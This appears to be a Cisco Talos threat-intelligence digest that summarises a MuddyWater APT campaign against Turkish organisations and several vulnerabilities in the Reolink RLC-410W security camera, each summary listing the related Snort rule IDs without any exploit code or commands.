SELECTED BY THE TALOS SECURITY INTELLIGENCE AND RESEARCH GROUP
Title: New insight into recently unmasked MuddyWater APT
Description: Cisco Talos has observed a new campaign targeting Turkish private organizations alongside governmental institutions. Talos attributes this campaign with high confidence to MuddyWater — an APT group recently attributed to Iran's Ministry of Intelligence and Security (MOIS) by the U.S. Cyber Command. This campaign utilizes malicious PDFs, XLS files and Windows executables to deploy malicious PowerShell-based downloaders acting as initial footholds into the target's enterprise. MuddyWater's use of script-based components such as obfuscated PowerShell-based downloaders is also a tactic described in the advisory from January 2021 by the U.S. Cyber Command. This campaign also utilizes canary tokens to track successful infection of targets, a new addition to this group's arsenal of tactics, techniques and procedures (TTPs). This specific method of taking advantage of canary tokens in this campaign may also be a measure to evade sandbox-based detection systems.
SNORT® SIDs: 58929 - 58938
Title: WiFi-connected security camera could be manipulated to spy on communications
Description: Cisco Talos recently discovered several vulnerabilities in the Reolink RLC-410W security camera that could allow an attacker to perform several malicious actions, including performing man-in-the-middle attacks, stealing user login credentials and more. The Reolink RLC-410W is a WiFi-connected security camera. The camera includes motion detection functionalities and multiple ways to save and view the recordings. The vulnerabilities Talos discovered exist in various functions and features of the camera. Some of these exploits could be combined, as well, to reboot the camera without authentication or run certain APIs. There are five denial-of-service vulnerabilities that could allow an adversary to make the web service unresponsive and restart the device if they send specific network requests to the target. There are two other vulnerabilities that could be combined to reformat the camera’s memory card, effectively erasing all its recordings.
SNORT® SIDs: 58691 - 58693, 58698, 58699, 58718, 58817 – 58720 and 58926 – 58928